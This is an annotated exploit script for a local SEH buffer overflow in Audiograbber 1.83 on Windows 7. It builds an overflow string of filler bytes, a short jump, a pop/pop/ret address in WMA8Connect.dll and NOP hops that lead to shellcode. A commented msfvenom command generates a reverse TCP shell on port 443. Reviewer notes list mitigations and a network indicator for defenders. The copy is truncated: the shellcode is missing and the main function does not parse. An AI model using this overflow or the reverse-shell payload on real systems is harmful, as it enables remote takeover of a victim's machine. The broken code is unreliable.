# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)
#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
# Tested with Windows 7 SP1 (x86)
# Steps:
# - Paste the contents of "poc.txt" into the "Interpret" or "Album" field
class Exploit:
    """Proof-of-concept input builder for the Audiograbber 1.83 SEH overflow.

    The class concatenates a fixed-layout string in ``self._payload``. Per
    the file header, the result is meant to be pasted into the "Interpret"
    or "Album" field of the application on Windows 7 SP1 (x86).

    Reviewer notes (defensive reading):
    - The trigger is a text-field value longer than the 256 filler bytes,
      so the root cause is presumably a missing length check on that field
      in the application -- confirm against the vendor code or an advisory.
    - The layout depends on one hard-coded address attributed to
      WMA8Connect.dll. That only holds if the module loads at a predictable
      base and the handler address is accepted at dispatch time; ASLR and
      SafeSEH opt-in for bundled modules, plus system-wide SEHOP and DEP,
      are the mitigations to check on affected hosts.
    - This copy of the script is incomplete (see ``__write`` and ``run``).
    """

    def __init__(self, shellcode):
        """Store the caller-supplied shellcode string; the payload starts unset."""
        self._shellcode = shellcode
        self._payload = None

    def __write(self):
        """Open ``poc.txt`` in the current directory for writing.

        NOTE(review): in the visible text the handle is opened (truncating any
        existing file) but nothing is written and it is never closed; the
        remaining lines appear to be missing from this copy.
        """
        f = open("poc.txt", "w")

    def run(self):
        """Assemble ``self._payload`` from filler, two 4-byte records and padding.

        Nothing is returned, and ``__write`` is not called in the visible
        lines, so as shown the payload only exists in memory.
        """
        # 256 filler bytes; presumably the distance to the overwritten SEH
        # record on the tested build -- not verifiable from this file.
        pattern = "A" * 256
        jmp_short = "\xeb\x08\x90\x90"  # x86 short JMP (EB 08) followed by two NOP bytes
        # Little-endian 0x10019179, attributed by the author to WMA8Connect.dll;
        # the variable name suggests a pop/pop/ret sequence -- TODO confirm.
        pop2ret = "\x79\x91\x01\x10"
        self._payload = pattern
        self._payload += jmp_short
        self._payload += pop2ret
        # The author reports that the buffer is mangled in the target, so
        # execution has to hop over the damaged parts to reach the shellcode.
        # Each hop is a run of NOP bytes (0x90) ending in another short jump;
        # the run lengths 18, 28 and 32 are the author's values for the
        # tested build.
        self._payload += "\x90" * 18 + jmp_short
        self._payload += "\x90" * 28 + jmp_short
        self._payload += "\x90" * 32 + self._shellcode
def main():
    """Create an Exploit object from an encoded shellcode string.

    NOTE(review): this copy is truncated. The shellcode literal is absent,
    its parenthesis is never closed, and no call to ``run()`` is visible,
    so the function does not parse as shown.
    """
    # Generator command recorded by the author. LHOST is blank as published.
    # For defenders: the payload type is a reverse TCP shell on port 443, so
    # an outbound connection on 443 initiated by the Audiograbber process is
    # the network-side indicator to look for.
    # msfvenom --platform windows -p windows/shell_reverse_tcp \
    # LHOST= LPORT=443 -b "\x00\x0a\x0d" \
    # -e x86/alpha_mixed -f py
    shellcode = (
    # NOTE(review): shellcode bytes are missing here in this copy.
    exploit = Exploit(shellcode)
if __name__ == "__main__":